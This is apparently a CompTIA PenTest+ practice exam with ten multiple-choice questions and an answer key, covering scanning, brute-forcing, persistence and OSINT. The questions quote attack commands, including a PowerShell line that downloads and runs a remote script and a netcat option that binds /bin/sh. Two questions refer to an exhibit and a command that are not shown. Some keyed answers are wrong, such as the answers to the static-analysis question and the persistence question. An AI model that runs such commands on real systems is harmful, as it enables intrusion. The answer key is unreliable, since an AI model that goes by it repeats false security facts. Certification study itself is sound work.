comptia pt0-001 practice test
CompTIA PenTest+ Certification Exam
Question 1
Click the exhibit button.
Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used
to exploit the target system? (Choose two.)
- A. Arbitrary code execution
- B. Session hijacking
- C. SQL injection
- D. Login credential brute-forcing
- E. Cross-site request forgery
Answer:
B D
Question 2
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the
software developer perform?
- A. Vulnerability scan
- B. Dynamic scan
- C. Static scan
- D. Compliance scan
Answer:
A
Question 3
A penetration tester runs the following on a machine:
Which of the following will be returned?
- A. 1
- B. 3
- C. 5
- D. 6
Answer:
B
Question 4
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with
an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
- A. fpipe.exe -1 8080 -r 80 100.170.60.5
- B. ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5
- C. nmap -sS -A -f 100.170.60.5
- D. nc 100.170.60.5 8080 /bin/sh
Answer:
B
Question 5
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1);Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
- A. Set the execution policy.
- B. Execute a remote script.
- C. Run an encoded command.
- D. Instantiate an object.
Answer:
B
Question 6
Which of the following tools is used to perform a credential brute force attack?
- A. Hydra
- B. John the Ripper
- C. Hashcat
- D. Peach
Answer:
A
Explanation:
Reference: https://www.greycampus.com/blog/information-security/brute-force-attacks-prominent-tools-to-tackle-such-
attacks
Question 7
During a physical security review, a detailed penetration testing report was obtained, which was issued to a security analyst
and then discarded in the trash. The report contains validated critical risk exposures. Which of the following processes would
BEST protect this information from being disclosed in the future?
- A. Restrict access to physical copies to authorized personnel only.
- B. Ensure corporate policies include guidance on the proper handling of sensitive information.
- C. Require only electronic copies of all documents to be maintained.
- D. Install surveillance cameras near all garbage disposal areas.
Answer:
B
Question 8
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following
would achieve that goal?
- A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run
- B. net session server | dsquery -user | net use c$
- C. powershell && set-executionpolicy unrestricted
- D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
Answer:
D
Question 9
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this
engagement?
- A. Nikto
- B. WAR
- C. W3AF
- D. Swagger
Answer:
D
Explanation:
Reference: https://blog.securelayer7.net/api-penetration-testing-with-owasp-2017-test-cases/
Question 10
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work
phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following
BEST describes the technique that was used to obtain this information?
- A. Enumeration of services
- B. OSINT gathering
- C. Port scanning
- D. Social engineering
Answer:
B